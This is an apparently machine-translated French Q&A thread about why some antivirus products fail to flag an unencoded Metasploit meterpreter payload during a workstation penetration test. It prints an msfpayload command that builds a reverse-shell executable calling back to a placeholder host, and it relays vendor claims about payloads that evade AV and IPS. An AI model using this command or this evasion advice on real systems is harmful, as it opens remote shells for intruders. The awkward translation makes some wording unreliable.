L'anti-virus doit-il détecter des charges utiles métasploitant?
Dans le cadre d'un test de stylo de poste de travail, je copie une charge utile métasploite simple sur le poste de travail et essayez de l'exécuter. Habituellement, cela est bloqué par un logiciel anti-virus. Cependant, parfois ce n'est pas (je ne nommerai pas les délinquants). Le logiciel AV est en cours d'exécution et détecte correctement EICAR, mais il ne détecte pas une simple charge utile métasploite non codée.
Mon instinct est qu'il s'agit d'une défaillance du logiciel AV et doit être signalée comme une vulnérabilité. Cependant, je me suis demandé si ce comportement pourrait en fait être destiné? Existe-t-il des arguments légitimes que "Metasploit n'est pas un virus"?
Dans ce cas, la charge utile est Windows/MeterPreter/Reverse_tCP codée sous forme de fichier EXE, sans obfuscation. Généré à l'aide de cette commande:
msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 X > payload.exe
C'est une course aux armements. Les développeurs de métasploient veulent développer des plugins qui défaient Anti-Virus. Les développeurs d'anti-virus veulent vaincre les plugins métasploiter.
Ils ne peuvent pas tous les deux réussir, alors parfois, l'AV déploie des signatures qui détectent tous les modules métasployants, parfois les développeurs métasploits trouveront une nouvelle façon d'évider AV.
Vous penseriez que les fournisseurs AV avaient l'avantage en raison de la métasploit étant ouverte à la source, mais évidemment pas dans ce cas.
Cela dépend de la version de Metasploit que vous utilisez. Dans la version Metasploiting Pro, vous pouvez profiter de dynamique charge utile qui peut certainement échapper à l'antivirus.
Selon Rapid7, des charges utiles dynamiques peuvent:
• Évitez les 10 meilleures solutions AV dans plus de 90% des cas. Aucun fournisseur AV ne détecte toutes les options de charge utile MSP!
• Utilisez des corrections d'erreur pour effectuer des sessions plus stables que la régulière MSF sessions
• encoder le trafic lors du téléchargement de la charge utile, qui peut aider à Evencer IPS
Essayez de télécharger la charge utile sur Total du virus Pour vérifier si d'autres antivirus détectent la charge utile ou non. Si un bon nombre d'antivirus envisageez votre charge utile en tant que virus, cela signifie simplement que votre antivirus est obsolète. Essayez Mise à jour de vos définitions de virus ou de changer votre antivirus.